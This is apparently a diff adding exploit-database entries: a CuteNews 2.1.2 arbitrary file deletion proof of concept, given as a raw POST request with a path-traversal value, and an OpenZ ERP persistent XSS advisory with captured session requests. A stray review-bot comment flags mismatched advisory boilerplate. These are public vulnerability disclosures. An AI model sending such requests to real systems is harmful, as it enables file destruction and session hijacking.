+http://sentrifugo.localhost:8080/index.php/expenses/expenses/
+http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/php/webapps/48447.txt b/exploits/php/webapps/48447.txt
new file mode 100644
index 000000000..16134af4c
--- /dev/null
+++ b/exploits/php/webapps/48447.txt
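Review bot: The Technical Details paragraph attributes the issue to `the official Mahara v19.10.2 CMS web-application series`, which contradicts the title, the Affected Product(s) section and the PoC hostname, all of which name Sentrifugo v3.2; the line should read `the official Sentrifugo v3.2 CMS web-application`. This reads like text carried over from a different advisory, so the rest of that boilerplate paragraph is worth re-checking against the `/expenses/expenses/edit` module it goes on to describe.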
@@ -0,0 +1,37 @@
+# Exploit Title: CuteNews 2.1.2 - Arbitrary File Deletion
+# Date: 2020-05-08
+# Author: Besim ALTINOK
+# Vendor Homepage: https://cutephp.com
+# Software Link: https://cutephp.com/click.php?cutenews_latest
+# Version: v2.1.2 (Maybe it affect other versions)
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+# Remotely: Yes
+
+Description:
+------------------------------------------------------------------------
+In the "Media Manager" area, users can do arbitrarily file deletion.
+Because the developer did not use the unlink() function as secure. So, can
+be triggered this vulnerability by a low user account
+
+
+Arbitrary File Deletion PoC
+--------------------------------------------------------------------------------
+
+POST /cute/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 **********************************
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 222
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/cute/index.php
+Cookie: CUTENEWS_SESSION=3f6a6ea7089e3a6a04b396d382308022
+Upgrade-Insecure-Requests: 1
+
+mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=27966e9129793e80a70089ee1c3ebfd5-tester&__signature_dsi=0ad6659c2aa31871b0b44617cf0b1200&rm%5B%5D=../avatar.png&do_action=delete
\ No newline at end of file
diff --git a/exploits/php/webapps/48450.txt b/exploits/php/webapps/48450.txt
new file mode 100644
index 000000000..9f64de59e
--- /dev/null
+++ b/exploits/php/webapps/48450.txt
@@ -0,0 +1,192 @@
+# Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting
+# Date: 2020-05-11
+# Exploit Author: Vulnerability-Lab
+# Vendor: https://www.openz.de/
+# https://www.openz.de/download.html
+
+Document Title:
+===============
+OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2234
+
+
+Common Vulnerability Scoring System:
+====================================
+4.6
+
+
+Product & Service Introduction:
+===============================
+https://www.openz.de/
+https://www.openz.de/download.html
+
+
+Affected Product(s):
+====================
+OpenZ
+Product: OpenZ v3.6.60 - ERP (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-06: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent cross site scripting web vulnerability has been discovered
+in the official OpenZ v3.6.60 ERP web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent vulnerability is located in the `inpname` and
+`inpdescripción` parameters of the `Employee` add/register/edit
+module in the `menu.html` file. Remote attackers with low privileges are
+able to inject own malicious persistent script code as
+name or description. The injected code can be used to attack the
+frontend or backend of the web-application. The request method
+to inject is POST and the attack vector is located on the
+application-side. The attack can be triggered from low privilege user
+accounts against higher privilege user accounts like manager or
+administrators to elevate privileges via session hijacking.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external
+redirects to malicious source and persistent manipulation of affected
+application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Employee
+
+Vulnerable Input(s):
+[+] Mitarbeiter Name
+[+] Beschreibung
+
+Vulnerable File(s):
+[+] Menu.html
+
+Vulnerable Parameter(s):
+[+] inpname
+[+] inpdescription
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by low privileged web
+application user account with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the openz web-application
+2. Register, add or edit via profile settings the inpname &
+inpdescription parameter inputs
+3. Edit inpname & inpdescription parameter of the profile and save the entry
+Note: The execute occurs on preview of the user credentials in the
+/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html
+4. Successful reproduce of the persistent web vulnerability!
+
+
+
+--- POC Session Logs [POST] --- (Inject via Add / Edit)
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html
+Host: localhost:8080
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1464
+Origin: https://localhost:8080
+Connection: keep-alive
+Referer:
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html
+Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544;
+_ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275
+Command=SAVE_EDIT_RELATION&inpLastFieldChanged=inpdescription&inpkeyColumnIdInp=&inpParentKeyColumn=&inpDirectKey=&
+inpKeyReferenceColumnName=&inpTableReferenceId=&inpKeyReferenceId=&autosave=N&inpnewdatasetindicator=&inpnewdataseIdVal=&
+inpenabledautosave=Y&inpisemployee=Y&inpistaxexempt=N&inpadClientId=C726FEC915A54A0995C568555DA5BB3C&inpaAssetId=&
+inpcGreetingId=&inpcBpartnerId=8BEB3E9FD5D24F9BBCF777A51D53F5AF&inpissummary=N&inprating=N&inpTableId=AC9B98C649CD4F55B37714008EE8519F&
+inpkeyColumnId=C_BPartner_ID&inpKeyName=inpcBpartnerId&mappingName=/org.openbravo.zsoft.smartui.Employee/
+EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html&inpwindowId=39D3CD9F77A942D690965D49106F011B&
+inpTabId=A3D0B320B69845B386024B5FF6B1E266&inpCommandType=EDIT&updatedTimestamp=20200426170335&inpParentOrganization=&
+inpadOrgId=1AF9E07685234E0A9FEC1D9B58A4876B&inpadImageId=&
+inpvalue=325235&inpname=>">&
+inpdescription=>">&inpimageurl=31337&
+inpisactive=Y&inpisinresourceplan=Y&inpapprovalamt=0,00&inpcSalaryCategoryId=&inptaxid=&inpreferenceno=&
+inpcBpGroupId=42691AE1D13F400AB814B70361E167C3&inpadLanguage=de_DE&inpcountry=Deutschland&inpzipcode=&
+inpcity=&inpcreated=26-04-2020
+17:03:35&inpcreatedby=Service&inpupdated=26-04-2020
+17:03:35&inpupdatedby=Service
+-
+POST: HTTP/1.1 302 Found
+Server: Apache/2.4.38 (Debian)
+Location:
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html?Command=RELATION
+Content-Length: 0
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+- (Execution in Listing)
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/evil.source
+Host: myerponline.de
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer:
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html
+Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544;
+_ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.38 (Debian)
+Content-Type: text/html;charset=utf-8
+Content-Language: en
+Content-Length: 1110
+Keep-Alive: timeout=5, max=97
+Connection: Keep-Alive
+
+
+PoC: Vulnerable Source (/security/Menu.html)
+
+
+
+
+
+
+
+
+
+
+325235 -
+>">